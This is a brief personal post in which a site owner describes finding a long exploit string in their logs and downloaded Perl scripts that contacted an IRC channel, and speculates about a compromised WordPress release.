Why are people so Unkind?

I went back to the logs and found it was a really long exploit string 
the downloads include perl scripts designed to hook up to an IRC channel 
for instructions.

I think this was a wordpress exploit where they discovered someone had 
submitted exploit code to the official release. My wordpress doesn't 
have any plugins of that name.
